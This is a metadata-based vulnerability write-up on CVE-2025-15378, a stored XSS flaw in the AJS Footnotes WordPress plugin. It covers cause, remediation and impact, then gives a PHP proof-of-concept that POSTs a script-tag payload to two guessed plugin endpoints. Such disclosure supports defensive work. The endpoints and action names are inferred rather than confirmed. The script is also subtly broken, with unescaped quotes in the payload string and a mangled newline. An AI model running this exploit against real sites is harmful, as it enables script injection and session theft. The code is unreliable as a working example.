Atomic Edge analysis of CVE-2025-15378 (metadata-based):
This vulnerability is an unauthenticated stored cross-site scripting (XSS) flaw in the AJS Footnotes WordPress plugin. The issue resides in the plugin’s settings save functionality, specifically affecting the ‘note_list_class’ and ‘popup_display_effect_in’ parameters. The vulnerability allows any unauthenticated attacker to inject malicious scripts that execute whenever a user accesses a compromised page.
Atomic Edge research indicates the root cause is a combination of three security failures. The vulnerability description confirms missing authorization and nonce verification on the settings save operation. This lack of checks permits unauthenticated requests to trigger the update function. The description also confirms insufficient input sanitization and output escaping. Based on CWE-79, Atomic Edge analysis infers the plugin likely stores unsanitized user input in the database and later outputs it without proper escaping, allowing script execution in a victim’s browser.
Exploitation involves sending a crafted HTTP request to the plugin’s settings update endpoint. The exact endpoint is not specified in the metadata. However, common WordPress patterns suggest the handler is likely an AJAX action registered with `wp_ajax_nopriv_` or an admin-post endpoint without proper capability checks. An attacker would send a POST request containing malicious JavaScript payloads in the ‘note_list_class’ and ‘popup_display_effect_in’ parameters. These payloads would then be stored and rendered on the site’s front end, executing in the context of any visiting user’s session.
Remediation requires implementing multiple security controls. The plugin must add a proper capability check, such as `current_user_can(‘manage_options’)`, to the settings update function. It must also implement nonce verification using `check_ajax_referer()` or `wp_verify_nonce()`. For the XSS vector, the plugin must apply input sanitization with functions like `sanitize_text_field()` before storing the values. It must also apply context-appropriate output escaping with functions like `esc_attr()` or `esc_html()` when rendering these settings values in HTML.
The impact of successful exploitation is significant. An attacker can inject arbitrary JavaScript that executes in the browsers of any site visitor or administrator. This can lead to session hijacking, site defacement, malicious redirects, or theft of sensitive information like cookies and session tokens. The stored nature of the attack means a single injection can affect multiple users over time. The CVSS score of 7.2 reflects the high attack vector (network), low attack complexity, and the scope change (impacting user confidentiality and integrity).
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-15378 - AJS Footnotes <= 1.0 - Unauthenticated Stored Cross-Site Scripting
<?php
/**
* Proof of Concept for CVE-2025-15378.
* This script attempts to exploit the unauthenticated stored XSS vulnerability.
* The exact AJAX action or admin endpoint is inferred from common WordPress plugin patterns.
* Two likely endpoints are tested.
*/
$target_url = 'http://vulnerable-site.local'; // CONFIGURE THIS
// Payload to inject a basic alert for demonstration.
// In a real attack, this would be malicious JavaScript.
$xss_payload = '"><script>alert('Atomic Edge XSS Test');</script>';
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
// Test against a likely AJAX endpoint.
// Many plugins use an action derived from the plugin slug.
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$post_data_ajax = [
'action' => 'ajs_footnotes_save_settings', // Inferred action name
'note_list_class' => $xss_payload,
'popup_display_effect_in' => $xss_payload
];
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data_ajax);
$response_ajax = curl_exec($ch);
// Test against a likely admin-post.php endpoint.
$admin_post_url = $target_url . '/wp-admin/admin-post.php';
$post_data_admin = [
'action' => 'ajs_footnotes_update', // Inferred action name
'note_list_class' => $xss_payload,
'popup_display_effect_in' => $xss_payload
];
curl_setopt($ch, CURLOPT_URL, $admin_post_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data_admin);
$response_admin = curl_exec($ch);
curl_close($ch);
// The script does not verify success as the response is not defined in the metadata.
// A successful exploit would require visiting a site page where the injected settings are output.
echo "PoC requests sent. Check the site front-end for XSS execution.n";
?>
